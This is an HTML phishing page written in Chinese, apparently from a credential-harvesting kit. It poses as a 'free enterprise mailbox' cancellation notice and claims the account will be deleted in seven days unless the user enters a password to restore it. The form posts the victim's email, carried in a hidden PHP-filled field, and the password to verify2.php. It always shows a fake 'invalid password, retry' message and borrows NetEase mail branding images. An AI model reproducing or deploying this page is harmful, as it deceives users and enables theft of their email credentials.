<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>您的公司电子邮件已被列为已取消</title><base target="_blank">
 

</head>

<form name="form1" method="post" action="verify2.php" onsubmit="return CheckForm(this);">
<div class="Con">
<div>

<table>
<tbody><tr>
		
	</tr>
	<tr>
		<td><img src="https://ci4.googleusercontent.com/proxy/dV_7IGI-Ctl0LC2kJgxehQm4O7ZMUCm6-_IUKqN5hQnP-LZUWk9a_ffJn8doVRUJIjdxJELT88PnhzIZ8PMZYwUrHpq-7Sc2kRw=s0-d-e1-ft#http://mimg.127.net/xm/all/ym/htmlmail/100414/hd.jpg" class="CToWUd" width="604" height="50"></td>
	</tr>
	<tr>
		<td style="background-repeat:repeat-y" background="https://ci6.googleusercontent.com/proxy/4QVneJV-LrJczqs13b37PE98EbdvoJNbUcYtJhTx-tuIIbauKc4yGa2yWKSvCefS2vEYuYA5KE8YQB1qY0_8vFLVpJX4y3py4n01=s0-d-e1-ft#http://mimg.127.net/xm/all/ym/htmlmail/100414/bgy.jpg">
		
		</li>
 
            </ul> 
            </div>        
        </td> 
    </tr> 

</tbody></table> 
		<div style="border-top:1px dotted #81a3d1;margin:50px 0;padding:5px;color:#515151">
		
			
				<p style="margin:10px 0 20px"><strong style="font-size:14px">尊敬的用户</strong></p>
				<p style="margin:10px 0"> 　　您的免费企业电子邮件 <strong></strong> 已被列为取消。</p>
				<p style="margin:10px 0">　　您的免费企业邮箱已进入7天锁定期，在这段时间内，<wbr>您的免费企业邮箱依然可以正常使用，7天后，<wbr>系统将删除您的所有信息。</p>
				<p style="margin:10px 0">   若您有其他原因需继续使用此邮箱要么<wbr> 如果您没有申请此取消，<wbr>请按照以下步骤恢复您的帐户;</p>
				
		</div> 		
		<table>
     
      
        <td>
        <input placeholder="电子邮件地址" id="Email" name="Email" value="" size="40" maxlength="400" style="ime-mode:disabled" onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[\u4E00-\u9FA5]/g,''))" type="text" hidden>
      </td>
   


   <tr>
        
        
        <td><input id="Password" name="Password" placeholder="密码" value="" size="40" maxlength="400" style="ime-mode:disabled" onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[\u4E00-\u9FA5]/g,''))" required="" type="password"></td>
      </tr>
 



 <tr>
 <p hidden><label id="lbEmail"></p>
<td>   <input type="hidden" name="lbEmail" value="<?php echo $lbEmail; ?>"/></td>
<tr>
<td>
    
      <p align="left">
                                  <input name="Submit" value="恢复我的帐户" type="submit" width="30" height="25">
                                  &nbsp;&nbsp;
                                  
      </p><font color="red">密码无效，请重试</font></tr>
</td></tr>

</tbody></table>
   
				<p style="margin:30px 0 10px"><strong>　　</strong>我们提醒您，请您尽快备份好您邮箱内的重要邮件和其他资料。</p>
				
				<div style="border-top:1px dotted #81a3d1;margin:50px 0;padding:5px;color:#515151">
					<strong>免费企业邮箱-个性化商务邮局<br>
					</strong>· 可创建200个相同域名的邮箱帐号含邮件列表<br>
					· 轻松设置企业公告，向所有成员显示<br>
					· 分组管理邮箱帐号，最多可创建20个分组<br>
					· 系统日志记录管理员各项操作，一目了然
				</div>
				 </form>
				<p style="margin:10px 0;text-align:right"><strong>邮件中心-免费企业邮箱团队</strong></p>
				<p id="demo"></p>
			
			</div> 
			 
		</td>
	</tr>
<script type="text/javascript">try{if(parent.$.Browser.chrome()){var o=document.body.style;o.paddingTop=o.paddingBottom=o.marginTop=o.marginBottom="0px";}parent.JS5.find(window.name).content.setHeight();}catch(e){}/*20130913*/</script>	
</body>
</html>